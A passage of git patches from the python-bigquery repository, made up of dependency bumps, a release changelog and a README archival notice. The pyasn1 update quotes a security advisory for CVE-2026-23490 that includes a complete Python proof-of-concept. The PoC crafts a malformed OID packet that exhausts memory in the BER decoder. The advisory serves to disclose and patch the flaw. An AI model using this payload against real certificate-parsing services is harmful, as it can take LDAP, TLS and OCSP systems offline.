geopandas/geopandas (geopandas) ### [`v1.1.2`](https://redirect.github.com/geopandas/geopandas/blob/HEAD/CHANGELOG.md#Version-112-December-22-2025) [Compare Source](https://redirect.github.com/geopandas/geopandas/compare/v1.1.1...v1.1.2) Bug fixes: - Fix an issue that caused an error in `GeoDataFrame.from_features` when there is no `properties` field ([#​3599](https://redirect.github.com/geopandas/geopandas/issues/3599)). - Fix `read_file` and `to_file` errors ([#​3682](https://redirect.github.com/geopandas/geopandas/issues/3682)) - Fix `read_parquet` with `to_pandas_kwargs` for complex (list/struct) arrow types ([#​3640](https://redirect.github.com/geopandas/geopandas/issues/3640)) - `value_counts` on GeoSeries now preserves CRS in index ([#​3669](https://redirect.github.com/geopandas/geopandas/issues/3669)) - Fix f-string placeholders appearing in error messages when `pyogrio` cannot be imported ([#​3682](https://redirect.github.com/geopandas/geopandas/issues/3682)). - Fix `read_parquet` with `to_pandas_kwargs` for complex (list/struct) arrow types ([#​3640](https://redirect.github.com/geopandas/geopandas/issues/3640)). - `.to_json` now provides a clearer error message when called on a GeoDataFrame without an active geometry column ([#​3648](https://redirect.github.com/geopandas/geopandas/issues/3648)). - Calling `del gdf["geometry"]` now will downcast to a `pd.DataFrame` if there are no geometry columns left in the dataframe ([#​3648](https://redirect.github.com/geopandas/geopandas/issues/3648)). - Fix SQL injection in `to_postgis` via geometry column name ([#​3681](https://redirect.github.com/geopandas/geopandas/issues/3681)).
--- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index dd94deab6..ab8d6b6f9 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -10,7 +10,7 @@ db-dtypes==1.4.3 Fiona==1.10.1 geojson==3.2.0 geopandas===1.0.1; python_version <= '3.9' -geopandas==1.1.1; python_version >= '3.10' +geopandas==1.1.2; python_version >= '3.10' google-api-core==2.25.2 google-auth==2.41.1 google-cloud-bigquery==3.38.0 From 80ca3f5b6be483220cbefae1241c855de92690a0 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 12 Feb 2026 15:50:09 +0000 Subject: [PATCH 200/202] chore(deps): update dependency pyasn1 to v0.6.2 [security] (#2407) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [pyasn1](https://redirect.github.com/pyasn1/pyasn1) ([changelog](https://pyasn1.readthedocs.io/en/latest/changelog.html)) | `==0.6.1` → `==0.6.2` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/pyasn1/0.6.2?slim=true) | 
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/pyasn1/0.6.1/0.6.2?slim=true) | ### GitHub Vulnerability Alerts #### [CVE-2026-23490](https://redirect.github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq) ### Summary After reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. ### Details The integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496 ### PoC For the DoS: ```py import pyasn1.codec.ber.decoder as decoder import pyasn1.type.univ as univ import sys import resource # Deliberately set memory limit to display PoC try: resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024)) print("[*] Memory limit set to 100MB") except: print("[-] Could not set memory limit") # Test with different payload sizes to find the DoS threshold payload_size_mb = int(sys.argv[1]) print(f"[*] Testing with {payload_size_mb}MB payload...") payload_size = payload_size_mb * 1024 * 1024 # Create payload with continuation octets # Each 0x81 byte indicates continuation, causing bit shifting in decoder payload = b'\x81' * payload_size + b'\x00' length = len(payload) # DER length encoding (supports up to 4GB) if length < 128: length_bytes = bytes([length]) elif length < 256: length_bytes = b'\x81' + length.to_bytes(1, 'big') elif length < 256**2: length_bytes = b'\x82' + length.to_bytes(2, 'big') elif length < 256**3: length_bytes = b'\x83' + length.to_bytes(3, 'big') else: # 4 bytes can handle up to 4GB length_bytes = b'\x84' + length.to_bytes(4, 'big') # Use OID (0x06) for more aggressive parsing malicious_packet = b'\x06' + length_bytes + payload print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB") try: print("[*] Decoding (this may take time or exhaust memory)...") result = decoder.decode(malicious_packet, 
asn1Spec=univ.ObjectIdentifier()) print(f'[+] Decoded successfully') print(f'[!] Object size: {sys.getsizeof(result[0])} bytes') # Try to convert to string print('[*] Converting to string...') try: str_result = str(result[0]) print(f'[+] String succeeded: {len(str_result)} chars') if len(str_result) > 10000: print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!') except MemoryError: print(f'[-] MemoryError during string conversion!') except Exception as e: print(f'[-] {type(e).__name__} during string conversion') except MemoryError: print('[-] MemoryError: Out of memory!') except Exception as e: print(f'[-] Error: {type(e).__name__}: {e}') print("\n[*] Test completed") ``` Screenshots with the results: #### DoS Screenshot_20251219_160840 Screenshot_20251219_152815 #### Leak analysis A potential heap leak was investigated but came back clean: ``` [*] Creating 1000KB payload... [*] Decoding with pyasn1... [*] Materializing to string... [+] Decoded 2157784 characters [+] Binary representation: 896001 bytes [+] Dumped to heap_dump.bin [*] First 64 bytes (hex): 01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081 [*] First 64 bytes (ASCII/hex dump): 0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02 ..... @​..... @​.. 0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @​..... @​.... 0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @​..... @​..... 0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @​..... @​..... @​. [*] Digit distribution analysis: '0': 10.1% '1': 9.9% '2': 10.0% '3': 9.9% '4': 9.9% '5': 10.0% '6': 10.0% '7': 10.0% '8': 9.9% '9': 10.1% ``` ### Scenario 1. An attacker creates a malicious X.509 certificate. 2. The application validates certificates. 3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above. ### Impact This issue can affect resource consumption and hang systems or stop services. 
This may affect: - LDAP servers - TLS/SSL endpoints - OCSP responders - etc. ### Recommendation Add a limit to the allowed bytes in the decoder. --- ### Release Notes
pyasn1/pyasn1 (pyasn1) ### [`v0.6.2`](https://redirect.github.com/pyasn1/pyasn1/blob/HEAD/CHANGES.rst#Revision-062-released-16-01-2026) [Compare Source](https://redirect.github.com/pyasn1/pyasn1/compare/v0.6.1...v0.6.2) - CVE-2026-23490 (GHSA-63vm-454h-vhhq): Fixed continuation octet limits in OID/RELATIVE-OID decoder (thanks to tsigouris007) - Added support for Python 3.14 [pr #​97](https://redirect.github.com/pyasn1/pyasn1/pull/97) - Added SECURITY.md policy - Fixed unit tests failing due to missing code [issue #​91](https://redirect.github.com/pyasn1/pyasn1/issues/91) [pr #​92](https://redirect.github.com/pyasn1/pyasn1/pull/92) - Migrated to pyproject.toml packaging [pr #​90](https://redirect.github.com/pyasn1/pyasn1/pull/90)
--- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index ab8d6b6f9..5f4d686b3 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -27,7 +27,7 @@ packaging==25.0 pandas==2.3.3 proto-plus==1.26.1 pyarrow==21.0.0 -pyasn1==0.6.1 +pyasn1==0.6.2 pyasn1-modules==0.4.2 pycparser==2.23 pyparsing==3.2.5 From e8184fa38563b8e9aef265ec64836a931e9e89cd Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 12 Feb 2026 13:26:35 -0500 Subject: [PATCH 201/202] chore: librarian release pull request: 20260212T105312Z (#2415) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit PR created by the Librarian CLI to initialize a release. Merging this PR will auto trigger a release. Librarian Version: v0.8.0 Language Image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620
google-cloud-bigquery: 3.40.1 ## [3.40.1](https://togithub.com/googleapis/python-bigquery/compare/v3.40.0...v3.40.1) (2026-02-12) ### Bug Fixes * updates timeout/retry code to respect hanging server (#2408) ([24d45d0d](https://togithub.com/googleapis/python-bigquery/commit/24d45d0d)) * add timeout parameter to to_dataframe and to_arrow met… (#2354) ([4f67ba20](https://togithub.com/googleapis/python-bigquery/commit/4f67ba20)) ### Documentation * clarify that only jobs.query and jobs.getQueryResults are affec… (#2349) ([73228432](https://togithub.com/googleapis/python-bigquery/commit/73228432))
--- .librarian/state.yaml | 2 +- CHANGELOG.md | 13 +++++++++++++ google/cloud/bigquery/version.py | 2 +- 3 files changed, 15 insertions(+), 2 deletions(-) diff --git a/.librarian/state.yaml b/.librarian/state.yaml index 71bcf16ad..efce633f2 100644 --- a/.librarian/state.yaml +++ b/.librarian/state.yaml @@ -1,7 +1,7 @@ image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620 libraries: - id: google-cloud-bigquery - version: 3.40.0 + version: 3.40.1 last_generated_commit: "" apis: [] source_roots: diff --git a/CHANGELOG.md b/CHANGELOG.md index 242165933..083dbfc4f 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -4,6 +4,19 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.40.1](https://github.com/googleapis/google-cloud-python/compare/google-cloud-bigquery-v3.40.0...google-cloud-bigquery-v3.40.1) (2026-02-12) + + +### Documentation + +* clarify that only jobs.query and jobs.getQueryResults are affec… (#2349) ([73228432a3c821db05d898ea4a4788adf15b033d](https://github.com/googleapis/google-cloud-python/commit/73228432a3c821db05d898ea4a4788adf15b033d)) + + +### Bug Fixes + +* updates timeout/retry code to respect hanging server (#2408) ([24d45d0d5bf89762f253ba6bd6fdbee9d5993422](https://github.com/googleapis/google-cloud-python/commit/24d45d0d5bf89762f253ba6bd6fdbee9d5993422)) +* add timeout parameter to to_dataframe and to_arrow met… (#2354) ([4f67ba20b49159e81f645ed98e401b9bb1359c1a](https://github.com/googleapis/google-cloud-python/commit/4f67ba20b49159e81f645ed98e401b9bb1359c1a)) + ## [3.40.0](https://github.com/googleapis/google-cloud-python/compare/google-cloud-bigquery-v3.39.0...google-cloud-bigquery-v3.40.0) (2026-01-08) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 6b0fa0fba..2519009bf 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # 
See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.40.0" +__version__ = "3.40.1" From ca965f25fa3df5915d8763d277bb014a3de124cd Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Fri, 6 Mar 2026 12:43:50 -0500 Subject: [PATCH 202/202] build: update README to indicate that source has moved (#2421) Towards https://github.com/googleapis/google-cloud-python/issues/10980 --- README.rst | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/README.rst b/README.rst index 23ed9257d..5f8650b2b 100644 --- a/README.rst +++ b/README.rst @@ -1,3 +1,8 @@ +:**NOTE**: **This github repository is archived. The repository contents and history have moved to** `google-cloud-python`_. + +.. _google-cloud-python: https://github.com/googleapis/google-cloud-python/tree/main/packages/google-cloud-bigquery + + Python Client for Google BigQuery =================================